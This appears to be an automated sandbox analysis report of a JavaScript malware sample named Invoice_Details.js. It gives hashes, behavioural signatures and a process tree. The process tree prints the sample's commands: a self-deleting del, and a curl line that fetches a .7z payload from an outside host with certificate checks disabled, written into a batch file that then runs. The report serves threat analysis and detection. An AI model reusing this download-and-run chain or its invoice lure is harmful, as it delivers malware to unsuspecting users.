Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
18-07-2023 16:40
Static task
static1
Behavioral task
behavioral1
Sample
Invoice_Details.js
Resource
win7-20230712-en
General
-
Target
Invoice_Details.js
-
Size
42KB
-
MD5
22067f54377e90dc3fdd5f384c1fe3ee
-
SHA1
56b2afbc94b67f1c1f5e0a2340e25ca066b9baad
-
SHA256
5e5722af27fc7ae05a9f9705ce1d680fec5fef27a67019c37e2bd768c8e7c07e
-
SHA512
af74c25ae0cc74316411d129d7c0a13e81efe0b0cbb207c1e45e323288364b36d1b2d383af5161efb3a7c491494b67bfee90ec8c97420a956b623eb4f12bfe56
-
SSDEEP
384:kac3is6ZeUS1ogXzxmOP0U4OmB/P9rVOKeHBYH8Ffu+wtizOdKUmJYgqEq4SjoaM:/7ylm9FgH1gTP5C1XfW51TJfmh1EE
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2380 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
wscript.exedescription pid process target process PID 2780 wrote to memory of 2380 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2380 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2380 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2844 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2844 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2844 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2900 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2900 2780 wscript.exe cmd.exe PID 2780 wrote to memory of 2900 2780 wscript.exe cmd.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js"2⤵
- Deletes itself
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo curl http://cajaminoretino.site/signed/3939.7z --output "C:\Users\Admin\AppData\Local\Temp\magnam.t" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\explicabo.m.batFilesize
141B
MD581645f19426feb8cef198e042710cf15
SHA1864554e97313c0d6c8e38008ebf92c6a215ac56f
SHA2562e57a524f3da47467fc1abce82df02f2f4b16406480dadf2d48e7d992b89aba0
SHA51261b9a948b472ddc5d70884bc41f944fa760ca8628d64d768cf13d33c3f54610c693b0d9a6f12b31e9bcfebac5691c8365bb7f8740ec6b589e2955efe3063c5e5